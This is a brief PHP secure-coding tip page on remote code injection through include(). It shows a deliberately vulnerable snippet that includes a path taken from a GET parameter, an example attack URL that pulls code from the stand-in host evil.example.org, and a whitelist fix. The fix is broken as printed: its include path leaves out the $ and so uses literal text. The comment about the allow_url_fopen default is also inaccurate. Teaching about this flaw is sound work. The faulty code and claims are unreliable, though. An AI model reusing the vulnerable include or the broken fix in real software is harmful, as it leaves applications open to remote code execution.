PROGRAMMING

 
REMEMBERS




Last update:   29-10-2021

Remote code injection

A remote code injection attack occurs when an attacker is able to cause your application to execute PHP code of their choosing. Never use tainted data in an include or require.
 
// index.php

ini_set("allow_url_fopen", 1); // default 0

include "{$_GET['section']}/data.inc.php";

    // http://example.org/?section=news
    // include "news/data.inc.php";
 
// Attack

    // http://example.org/?section=evil.example.org/attack.inc
    // include "http://evil.example.org/attack.inc?data.inc.php";

Protection

It is easy to protect against it. Filter all input and never use tainted data in an include or require.
 
$clean = array();
$sections = array('home', 'news', 'photos', 'blog');
if (in_array($_GET['section'], $sections)) {
    $clean['section'] = $_GET['section'];
} else {
    $clean['section'] = 'home';
}
include "{clean['section']}/data.inc.php";
... 3 lines
 

Questions    
SQL injection

        A B C D E F
🔔
1/1